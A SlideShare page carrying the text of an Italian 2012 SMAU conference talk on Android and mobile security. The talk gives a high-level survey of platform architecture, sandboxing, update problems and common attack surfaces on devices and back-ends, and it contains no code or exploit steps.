Enviar búsqueda
Cargar
Smau Milano 2012 Igor Falcomata
•
0 recomendaciones
•
512 vistas
SMAU
Seguir
Android e mobile security: client side, server side, privacy
Leer menos
Leer más
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 33
Descargar ahora
Descargar para leer sin conexión
Recomendados
Smau Firenze 2015 - Easygov
Smau Firenze 2015 - Easygov
SMAU
Smau Milano 2015 - Igor Falcomatà
Smau Milano 2015 - Igor Falcomatà
SMAU
Smau Firenze 2016 - Leonardo Bellini, Dario Flaccovio Editore
Smau Firenze 2016 - Leonardo Bellini, Dario Flaccovio Editore
SMAU
Le Risorse Umane “digitali” nella Pubblica Amministrazione
Le Risorse Umane “digitali” nella Pubblica Amministrazione
SMAU
Smau Padova 2016 - Rosa Giuffrè
Smau Padova 2016 - Rosa Giuffrè
SMAU
Smau Firenze 2016 - Francesco Vernelli, Hoepli
Smau Firenze 2016 - Francesco Vernelli, Hoepli
SMAU
Smau Napoli 2016 - Francesco Margherita
Smau Napoli 2016 - Francesco Margherita
SMAU
Securing Android
Securing Android
Marakana Inc.
Recomendados
Smau Firenze 2015 - Easygov
Smau Firenze 2015 - Easygov
SMAU
Smau Milano 2015 - Igor Falcomatà
Smau Milano 2015 - Igor Falcomatà
SMAU
Smau Firenze 2016 - Leonardo Bellini, Dario Flaccovio Editore
Smau Firenze 2016 - Leonardo Bellini, Dario Flaccovio Editore
SMAU
Le Risorse Umane “digitali” nella Pubblica Amministrazione
Le Risorse Umane “digitali” nella Pubblica Amministrazione
SMAU
Smau Padova 2016 - Rosa Giuffrè
Smau Padova 2016 - Rosa Giuffrè
SMAU
Smau Firenze 2016 - Francesco Vernelli, Hoepli
Smau Firenze 2016 - Francesco Vernelli, Hoepli
SMAU
Smau Napoli 2016 - Francesco Margherita
Smau Napoli 2016 - Francesco Margherita
SMAU
Securing Android
Securing Android
Marakana Inc.
Android– forensics and security testing
Android– forensics and security testing
Santhosh Kumar
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
CODE BLUE
Telecoms 2.0: Understanding the Impact of Open Mobile
Telecoms 2.0: Understanding the Impact of Open Mobile
MobileMonday Norway
Deep Dive Into Android Security
Deep Dive Into Android Security
Marakana Inc.
Untitled 1
Untitled 1
Sergey Kochergan
CNIT 128 8: Mobile development security
CNIT 128 8: Mobile development security
Sam Bowne
Security testing of mobile applications
Security testing of mobile applications
GTestClub
Android 3.1 - Portland Code Camp 2011
Android 3.1 - Portland Code Camp 2011
sullis
Android security
Android security
Midhun P Gopi
Appaloosa & AppDome: deploy & protect mobile applications
Appaloosa & AppDome: deploy & protect mobile applications
Julien Ott
Iommu tracing reviewed
Iommu tracing reviewed
Samsung Open Source Group
Security models of modern mobile systems
Security models of modern mobile systems
Divya Raval
Designing Secure Mobile Apps
Designing Secure Mobile Apps
Denim Group
Mobile security
Mobile security
Stefaan
Android 3.0 Portland Java User Group 2011-03-15
Android 3.0 Portland Java User Group 2011-03-15
sullis
Android report
Android report
blogger at indiandswad
How to Test Security and Vulnerability of Your Android and iOS Apps
How to Test Security and Vulnerability of Your Android and iOS Apps
Bitbar
Outsmarting smartphones
Outsmarting smartphones
SensePost
Securely Deploying Android Device - ISSA (Ireland)
Securely Deploying Android Device - ISSA (Ireland)
Angelill0
Complexity of IOT/IOE Architectures for Smart Service Infrastructures Panel:...
Complexity of IOT/IOE Architectures for Smart Service Infrastructures Panel:...
Paolo Nesi
L'intelligenza artificiale per il marketing automation: come automatizzare le...
L'intelligenza artificiale per il marketing automation: come automatizzare le...
SMAU
Il supporto IA nella Lead Generation con Linkedin e Sales Navigator
Il supporto IA nella Lead Generation con Linkedin e Sales Navigator
SMAU
Más contenido relacionado
Similar a Smau Milano 2012 Igor Falcomata
Android– forensics and security testing
Android– forensics and security testing
Santhosh Kumar
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
CODE BLUE
Telecoms 2.0: Understanding the Impact of Open Mobile
Telecoms 2.0: Understanding the Impact of Open Mobile
MobileMonday Norway
Deep Dive Into Android Security
Deep Dive Into Android Security
Marakana Inc.
Untitled 1
Untitled 1
Sergey Kochergan
CNIT 128 8: Mobile development security
CNIT 128 8: Mobile development security
Sam Bowne
Security testing of mobile applications
Security testing of mobile applications
GTestClub
Android 3.1 - Portland Code Camp 2011
Android 3.1 - Portland Code Camp 2011
sullis
Android security
Android security
Midhun P Gopi
Appaloosa & AppDome: deploy & protect mobile applications
Appaloosa & AppDome: deploy & protect mobile applications
Julien Ott
Iommu tracing reviewed
Iommu tracing reviewed
Samsung Open Source Group
Security models of modern mobile systems
Security models of modern mobile systems
Divya Raval
Designing Secure Mobile Apps
Designing Secure Mobile Apps
Denim Group
Mobile security
Mobile security
Stefaan
Android 3.0 Portland Java User Group 2011-03-15
Android 3.0 Portland Java User Group 2011-03-15
sullis
Android report
Android report
blogger at indiandswad
How to Test Security and Vulnerability of Your Android and iOS Apps
How to Test Security and Vulnerability of Your Android and iOS Apps
Bitbar
Outsmarting smartphones
Outsmarting smartphones
SensePost
Securely Deploying Android Device - ISSA (Ireland)
Securely Deploying Android Device - ISSA (Ireland)
Angelill0
Complexity of IOT/IOE Architectures for Smart Service Infrastructures Panel:...
Complexity of IOT/IOE Architectures for Smart Service Infrastructures Panel:...
Paolo Nesi
Similar a Smau Milano 2012 Igor Falcomata
(20)
Android– forensics and security testing
Android– forensics and security testing
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
[CB16] Security in the IoT World: Analyzing the Security of Mobile Apps for A...
Telecoms 2.0: Understanding the Impact of Open Mobile
Telecoms 2.0: Understanding the Impact of Open Mobile
Deep Dive Into Android Security
Deep Dive Into Android Security
Untitled 1
Untitled 1
CNIT 128 8: Mobile development security
CNIT 128 8: Mobile development security
Security testing of mobile applications
Security testing of mobile applications
Android 3.1 - Portland Code Camp 2011
Android 3.1 - Portland Code Camp 2011
Android security
Android security
Appaloosa & AppDome: deploy & protect mobile applications
Appaloosa & AppDome: deploy & protect mobile applications
Iommu tracing reviewed
Iommu tracing reviewed
Security models of modern mobile systems
Security models of modern mobile systems
Designing Secure Mobile Apps
Designing Secure Mobile Apps
Mobile security
Mobile security
Android 3.0 Portland Java User Group 2011-03-15
Android 3.0 Portland Java User Group 2011-03-15
Android report
Android report
How to Test Security and Vulnerability of Your Android and iOS Apps
How to Test Security and Vulnerability of Your Android and iOS Apps
Outsmarting smartphones
Outsmarting smartphones
Securely Deploying Android Device - ISSA (Ireland)
Securely Deploying Android Device - ISSA (Ireland)
Complexity of IOT/IOE Architectures for Smart Service Infrastructures Panel:...
Complexity of IOT/IOE Architectures for Smart Service Infrastructures Panel:...
Más de SMAU
L'intelligenza artificiale per il marketing automation: come automatizzare le...
L'intelligenza artificiale per il marketing automation: come automatizzare le...
SMAU
Il supporto IA nella Lead Generation con Linkedin e Sales Navigator
Il supporto IA nella Lead Generation con Linkedin e Sales Navigator
SMAU
SMAU MILANO 2023 | Intrapreneurship: I dipendenti come driver dell'innovazione
SMAU MILANO 2023 | Intrapreneurship: I dipendenti come driver dell'innovazione
SMAU
SMAU MILANO 2023 | TECNOLOGIE IMMERSIVE E METAVERSO: SOLUZIONI INNOVATIVE PER...
SMAU MILANO 2023 | TECNOLOGIE IMMERSIVE E METAVERSO: SOLUZIONI INNOVATIVE PER...
SMAU
SMAU MILANO 2023 | SMAU MILANO 2023 | Le nuove frontiere dell'ESGtech
SMAU MILANO 2023 | SMAU MILANO 2023 | Le nuove frontiere dell'ESGtech
SMAU
SMAU MILANO 2023 | AI: Un Alleato Innovativo per l'Omnichannel Customer Exper...
SMAU MILANO 2023 | AI: Un Alleato Innovativo per l'Omnichannel Customer Exper...
SMAU
SMAU MILANO 2023 | 𝐃𝐢𝐠𝐢𝐭𝐚𝐥 𝐓𝐫𝐚𝐢𝐧𝐢𝐧𝐠 𝐉𝐨𝐮𝐫𝐧𝐞𝐲 La nuova frontiera della formazio...
SMAU MILANO 2023 | 𝐃𝐢𝐠𝐢𝐭𝐚𝐥 𝐓𝐫𝐚𝐢𝐧𝐢𝐧𝐠 𝐉𝐨𝐮𝐫𝐧𝐞𝐲 La nuova frontiera della formazio...
SMAU
SMAU MILANO 2023 | COME PROGETTARE SOLUZIONI CIRCOLARI E MODELLI DI BUSINESS ...
SMAU MILANO 2023 | COME PROGETTARE SOLUZIONI CIRCOLARI E MODELLI DI BUSINESS ...
SMAU
SMAU MILANO 2023 | Google Business Profile tra SEO e Social Media
SMAU MILANO 2023 | Google Business Profile tra SEO e Social Media
SMAU
SMAU MILANO 2023 | Il PM incontra la proprietà intellettuale: pianificare la ...
SMAU MILANO 2023 | Il PM incontra la proprietà intellettuale: pianificare la ...
SMAU
SMAU MILANO 2023 | Il neuromarketing: solo 8 secondi per catturare l’attenzio...
SMAU MILANO 2023 | Il neuromarketing: solo 8 secondi per catturare l’attenzio...
SMAU
SMAU MILANO 2023 | Collaborazioni vincenti: Come le startup possono creare pa...
SMAU MILANO 2023 | Collaborazioni vincenti: Come le startup possono creare pa...
SMAU
SMAU MILANO 2023 | Funnel Hacking: massimizzare il ROAS in 7 passaggi
SMAU MILANO 2023 | Funnel Hacking: massimizzare il ROAS in 7 passaggi
SMAU
SMAU MILANO 2023 | Una reputazione che ti precede: come il personal storytell...
SMAU MILANO 2023 | Una reputazione che ti precede: come il personal storytell...
SMAU
SMAU MILANO 2023 | Come scalare una produzione video: il caso “Vongola Lupino...
SMAU MILANO 2023 | Come scalare una produzione video: il caso “Vongola Lupino...
SMAU
SMAU MILANO 2023 | IA Generativa per aziende - come addestrare i modelli ling...
SMAU MILANO 2023 | IA Generativa per aziende - come addestrare i modelli ling...
SMAU
SMAU MILANO 2023 | L'intelligenza artificiale per davvero (facciamola sul ser...
SMAU MILANO 2023 | L'intelligenza artificiale per davvero (facciamola sul ser...
SMAU
SMAU MILANO 2023 | Personal Branding: come comunicare in maniera efficace la...
SMAU MILANO 2023 | Personal Branding: come comunicare in maniera efficace la...
SMAU
SMAU MILANO 2023 | What's Next? Rivoluzioni industriali, intelligenza artific...
SMAU MILANO 2023 | What's Next? Rivoluzioni industriali, intelligenza artific...
SMAU
SMAU MILANO 2023 | SMAU MILANO 2023 | Intelligenza Artificiale e chatbots
SMAU MILANO 2023 | SMAU MILANO 2023 | Intelligenza Artificiale e chatbots
SMAU
Más de SMAU
(20)
L'intelligenza artificiale per il marketing automation: come automatizzare le...
L'intelligenza artificiale per il marketing automation: come automatizzare le...
Il supporto IA nella Lead Generation con Linkedin e Sales Navigator
Il supporto IA nella Lead Generation con Linkedin e Sales Navigator
SMAU MILANO 2023 | Intrapreneurship: I dipendenti come driver dell'innovazione
SMAU MILANO 2023 | Intrapreneurship: I dipendenti come driver dell'innovazione
SMAU MILANO 2023 | TECNOLOGIE IMMERSIVE E METAVERSO: SOLUZIONI INNOVATIVE PER...
SMAU MILANO 2023 | TECNOLOGIE IMMERSIVE E METAVERSO: SOLUZIONI INNOVATIVE PER...
SMAU MILANO 2023 | SMAU MILANO 2023 | Le nuove frontiere dell'ESGtech
SMAU MILANO 2023 | SMAU MILANO 2023 | Le nuove frontiere dell'ESGtech
SMAU MILANO 2023 | AI: Un Alleato Innovativo per l'Omnichannel Customer Exper...
SMAU MILANO 2023 | AI: Un Alleato Innovativo per l'Omnichannel Customer Exper...
SMAU MILANO 2023 | 𝐃𝐢𝐠𝐢𝐭𝐚𝐥 𝐓𝐫𝐚𝐢𝐧𝐢𝐧𝐠 𝐉𝐨𝐮𝐫𝐧𝐞𝐲 La nuova frontiera della formazio...
SMAU MILANO 2023 | 𝐃𝐢𝐠𝐢𝐭𝐚𝐥 𝐓𝐫𝐚𝐢𝐧𝐢𝐧𝐠 𝐉𝐨𝐮𝐫𝐧𝐞𝐲 La nuova frontiera della formazio...
SMAU MILANO 2023 | COME PROGETTARE SOLUZIONI CIRCOLARI E MODELLI DI BUSINESS ...
SMAU MILANO 2023 | COME PROGETTARE SOLUZIONI CIRCOLARI E MODELLI DI BUSINESS ...
SMAU MILANO 2023 | Google Business Profile tra SEO e Social Media
SMAU MILANO 2023 | Google Business Profile tra SEO e Social Media
SMAU MILANO 2023 | Il PM incontra la proprietà intellettuale: pianificare la ...
SMAU MILANO 2023 | Il PM incontra la proprietà intellettuale: pianificare la ...
SMAU MILANO 2023 | Il neuromarketing: solo 8 secondi per catturare l’attenzio...
SMAU MILANO 2023 | Il neuromarketing: solo 8 secondi per catturare l’attenzio...
SMAU MILANO 2023 | Collaborazioni vincenti: Come le startup possono creare pa...
SMAU MILANO 2023 | Collaborazioni vincenti: Come le startup possono creare pa...
SMAU MILANO 2023 | Funnel Hacking: massimizzare il ROAS in 7 passaggi
SMAU MILANO 2023 | Funnel Hacking: massimizzare il ROAS in 7 passaggi
SMAU MILANO 2023 | Una reputazione che ti precede: come il personal storytell...
SMAU MILANO 2023 | Una reputazione che ti precede: come il personal storytell...
SMAU MILANO 2023 | Come scalare una produzione video: il caso “Vongola Lupino...
SMAU MILANO 2023 | Come scalare una produzione video: il caso “Vongola Lupino...
SMAU MILANO 2023 | IA Generativa per aziende - come addestrare i modelli ling...
SMAU MILANO 2023 | IA Generativa per aziende - come addestrare i modelli ling...
SMAU MILANO 2023 | L'intelligenza artificiale per davvero (facciamola sul ser...
SMAU MILANO 2023 | L'intelligenza artificiale per davvero (facciamola sul ser...
SMAU MILANO 2023 | Personal Branding: come comunicare in maniera efficace la...
SMAU MILANO 2023 | Personal Branding: come comunicare in maniera efficace la...
SMAU MILANO 2023 | What's Next? Rivoluzioni industriali, intelligenza artific...
SMAU MILANO 2023 | What's Next? Rivoluzioni industriali, intelligenza artific...
SMAU MILANO 2023 | SMAU MILANO 2023 | Intelligenza Artificiale e chatbots
SMAU MILANO 2023 | SMAU MILANO 2023 | Intelligenza Artificiale e chatbots
Último
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Andrey Devyatkin
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
sudhanshuwaghmare1
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Khushali Kathiriya
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Neo4j
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
wesley chun
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
The Digital Insurer
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
DianaGray10
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
Último
(20)
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Smau Milano 2012 Igor Falcomata
1.
Android e mobile
security relatore: Igor Falcomatà client side, server side, privacy do android malware writers dream of electric sheep? seminari AIPSI free advertising > Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano http://creativecommons.org/licenses/by-sa/2.0/it/deed.it © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 1
2.
Chi:
aka “koba” • attività professionale: •analisi delle vulnerabilità e penetration testing (~13 anni) •security consulting •formazione Relatore: • altro: •sikurezza.org •(F|Er|bz)lug Igor Falcomatà Chief Technical Officer ifalcomata@enforcer.it Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 2
3.
Cosa:
un po' di crusca del mio sacco.. • App.. HTML5.. BYOD.. Cloud.. TheNextBuzzword.. come interagiscono queste componenti con la privacy degli utenti, la sicurezza dei dati sui dispositivi e sui server e l'entropia mondiale? • E le buone vecchie vulnerabilità nelle applicazioni web? • Esempi e dettagli su piattaforma Android • Adatto in generale a chiunque sia interessato alla sicurezza delle applicazioni "mobile". ..molta farina dai mulini altrui! Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 3
4.
Perché (device):
malware/exploit writer's dream platform? • diffusione e “geopardizzazione” (AUGH!) • sorgenti (AOSP), docs, SDK, NDK, emulatore, .. • .apk → decompilazione, reversing, debug • aggiornamenti OS, app e market alternativi • permessi delle applicazioni “delegati” agli utenti • Linux Kernel, ~ Linux userspace e librerie (e bug) • exploit mitigation techniques (fail) (< 2.3, < 4.0.3) • OOB “covert” channel (umts/gprs, SMS, ..) • territori poco explorati: OS/lib custom, hw driver Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 4
5.
Perché (utenti):
(governi|spioni|stalker|..)'s dream platform? • dati personali (posta, documenti, rubrica, calendario, ..) • intercettazioni (audio, video, messaging, network, ..) • geolocalizzazione (foto, social network, ..) • credenziali (siti, posta, VPN, ..) → cloud storage • HTML-like client side attacks • EvilApp want to eat your soul.. Install? YES!!! • BY0D (Bring Your 0wned Device) • banking OTP ($$) • NFC ($$) Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 5
6.
Perché (back-ends):
web application hacker's dream platform? • url e web-services “privati” • business logic esposta (client-side) • -> device -> credenziali -> back-end • -> device -> storage -> back-end • credenziali e certificati hard-coded (.apk) • no/lazy input validation • no/broken authentication & session management • the good ole web security vulns Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 6
7.
Diffusione http://www.webpronews.com/guess-how-many-android-devices-have-now-been-activated-google-io-2012-06
e molti device (basati su AOSP) che non si “attivano” .. Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 7
8.
Versioni
http://developer.android.com/about/dashboards/index.html e molti device che usano market alternativi .. Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 8
9.
(Low Cost) Devices http://www.alibaba.com/trade/search?fsb=y&IndexArea=product_en&SearchText=android
http://en.wikipedia.org/wiki/Comparison_of_Android_devices e molti device che usano market alternativi .. Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 9
10.
Docs & Tools
http://developer.android.com/ • API • Esempi & Howto • Sorgenti (AOSP) • .. • SDK/NDK • Eclipse plugin (ADT) • Emulatore (Arm, Intel, ..) • debug (ADB, ..) Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 10
11.
Exploiting Android is
c00l! http://cc.thinkst.com/searchMore/android/ + google, slideshare, stackoverflow, ypse, .. Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 11
12.
Android software stack
http://en.wikipedia.org/w/index.php?title=File:Android-System-Architecture.svg Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 12
13.
Kernel
http://en.wikipedia.org/wiki/Android_(operating_system)#Linux http://elinux.org/Android_Kernel_Features#Kernel_features_unique_to_Android • Architetture: ARM, (MIPS, x86, ..) • Kernel • Kernel Linux 2.6.x (Android 1, 2 e 3.x) • Kernel Linux 3.0.x (Android 4.x) • componenti e driver standard • FS, processi, permessi, processi • vulnerabilità standard ;) • Componenti custom • binder, ashmem, pmem, logger, wavelocks, OOM, alarm timers, paranoid network security, gpio, .. • android e vendor custom hw driver • nuove vulnerabilità da scoprire ;) Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 13
14.
Librerie + VM
http://source.android.com/tech/security/index.html#the-application-sandbox http://en.wikipedia.org/wiki/Dalvik_(software) • Sandbox (OS level) • sandboxing con uid/gid linux + patch kernel (protected API) • 1 processo = 1 applicazione = 1 VM (+ componenti OS) • protected API per accesso all'hw: camera, gps, bluetooth, telefonia, SMS/MMS, connessioni di rete) • root = root (full access) • Librerie • bionic libc (!= gnu libc, !posix) • udev, WebKit, OpenGL, SQLite, crypto, .. (& bugs) • Dalvik VM (!= JVM) • Java Code -> dex bytecode • custom Java libraries • può lanciare codice nativo (syscall, ioctls, .. ) -> kernel Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 14
15.
Librerie + VM
http://source.android.com/tech/security/index.html#the-application-sandbox http://en.wikipedia.org/wiki/Dalvik_(software) • Sandbox (OS level) • sandboxing con uid/gid linux + patch kernel (protected API) “Like all security features,OS) “Like all security componenti the • 1 processo = 1 applicazione = 1 VM (+ features, the • protected API per accesso all'hw: camera, gps,not Application Sandbox is not Application Sandbox is bluetooth, telefonia, SMS/MMS, connessioni di rete) unbreakable. However, to break unbreakable. However, to break • root = root (full access) out of the Application Sandbox out of the Application Sandbox • Librerie • bionic libc (!= gnu properly configured device, in a properly configured device, in a libc, !posix) one must compromise the • udev, WebKit, OpenGL, SQLite, crypto, .. (& bugs) one must compromise the security of the the Linux • Dalvik VM (!= JVM) security of the the Linux • Java Code -> dex bytecode kernel.” kernel.” • custom Java libraries • può lanciare codice nativo (syscall, ioctls, .. ) -> kernel Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 15
16.
Root(ing)
http://source.android.com/tech/security/index.html#rooting-of-devices meglio sviluppare sull'emulatore o su un device apposito :) Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 16
17.
Aggiornamenti
https://developer.android.com/guide/faq/security.html#fixes ●aggiornamenti delegati ai carrier/vendor ... ●aftermarket/homebrew (cyanogenmod, ..) ●aggiornamento app via market Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 17
18.
Exploit mitigation techniques
https://developer.android.com/guide/faq/security.html#fixes https://blog.duosecurity.com/2012/07/exploit-mitigations-in-android-jelly-bean-4- 1/ Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 18
19.
(FAIL) http://www.immunityinc.com/infiltrate/2011/presentations/Android_Attacks.pdf
“Reasonably competent “Reasonably competent attackers with no specific attackers with no specific background in Android hacking background in Android hacking can go to from zero to owning can go to from zero to owning Immunity's CEO in the span of a Immunity's CEO in the span of a week” week” Bas Albert + Massimiliano Oldani Bas Albert + Massimiliano Oldani Beating Up Android Beating Up Android [Practical Android Attacks] (Android 2.1) [Practical Android Attacks] (Android 2.1) Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 19
20.
Known vulnerabilities (scanner)
http://www.xray.io/#vulnerabilities Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 20
21.
Altri vettori d'attacco
(molto più praticabili) • rogue App • trojan App • trojan aftermarket fw (o carrier trojan ... <g>) • traffico di rete • client-side ~HTML attacks • decompilazione / reversing applicazioni • filesystem / permessi • setuid • praticamente non usati in Android “stock” • rooted devices + software di terze parti • homebrew (cyanogenmod, ..) Android e mobile security: client side, server side, privacy. – SMAU – seminari AIPSI – 18 ott. 2012 – Milano • © Igor Falcomatà <ifalcomata@enforcer.it>, alcuni diritti riservati: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Pagina 21
22.
App Security Permissions
